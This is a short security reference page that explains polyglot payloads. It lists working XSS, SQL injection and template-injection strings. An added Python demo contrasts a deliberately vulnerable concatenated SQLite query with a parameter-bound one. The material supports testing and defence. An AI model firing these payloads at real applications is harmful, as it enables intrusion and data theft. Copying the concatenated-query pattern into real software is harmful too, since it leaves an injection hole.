Polyglot Payload

A polyglot payload is a single input that is valid in multiple contexts or formats, so it can trigger a vulnerability regardless of how the application processes or renders that input.

Why Use Polyglots?

  • Unknown injection context
  • Application parses input multiple ways
  • Bypass context-specific filters
  • Testing efficiency - one payload, multiple vulnerabilities

XSS Polyglot Examples

# Works in multiple HTML contexts
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//

# Breaks out of various attribute contexts
"><script>alert(1)</script>
'><img src=x onerror=alert(1)>

# Comprehensive polyglot
'";!--"<XSS>=&{()}

SQL Injection Polyglot

# Works with various string delimiters
'-"#*/

# Comprehensive SQLi polyglot
'/**/OR/**/1=1/**/--/**/

# DBMS-agnostic
' OR '1'='1' --
' OR '1'='1' /*
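
Added example (not part of the original page): the four SQLi strings above run against a concatenated query and a parameter-bound query in an in-memory SQLite database, showing which ones break syntax, which ones return every row, and that binding treats all of them as plain data. The table, rows and function names are assumptions made for the illustration.

```python
import sqlite3

# Polyglot strings copied from the SQL Injection Polyglot section above.
PAYLOADS = [
    "'-\"#*/",
    "'/**/OR/**/1=1/**/--/**/",
    "' OR '1'='1' --",
    "' OR '1'='1' /*",
]

def make_db():
    # Constructed sample data (hypothetical table and rows).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "admin"), ("bob", "user")])
    return db

def lookup_concat(db, name):
    # Vulnerable 'before': input is spliced into the SQL text.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, name):
    # Hardened 'after': input is bound as a value and never parsed as SQL.
    return db.execute("SELECT name FROM users WHERE name = ?",
                      (name,)).fetchall()

def classify(lookup, db, payload):
    """Return 'error', 'bypass' (rows returned) or 'safe' (no rows)."""
    try:
        rows = lookup(db, payload)
    except sqlite3.Error:
        return "error"  # syntax break; surfaces as a SQL error in app logs
    return "bypass" if rows else "safe"

def run():
    db = make_db()
    return {p: (classify(lookup_concat, db, p), classify(lookup_bound, db, p))
            for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (concat, bound) in run().items():
        print(f"{payload!r:32} concat={concat:6} bound={bound}")
```

The `error` outcome is worth alerting on as much as `bypass`: a spike of SQL syntax errors carrying quote and comment characters is what probing with these strings looks like in application logs.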

File Format Polyglots

# JPEG/PHP polyglot (GIFAR-style)
# Valid image that's also valid PHP when included

# PDF/JavaScript polyglot
# Valid PDF containing executable JS

Template Injection Polyglot

# Tests multiple template engines
${{<%[%'"}}%\
{{7*7}}${7*7}<%=7*7%>#{7*7}

Usage in Testing

  • Fuzzing unknown input fields
  • Automated scanning
  • Black-box testing efficiency
  • Bypass filter testing
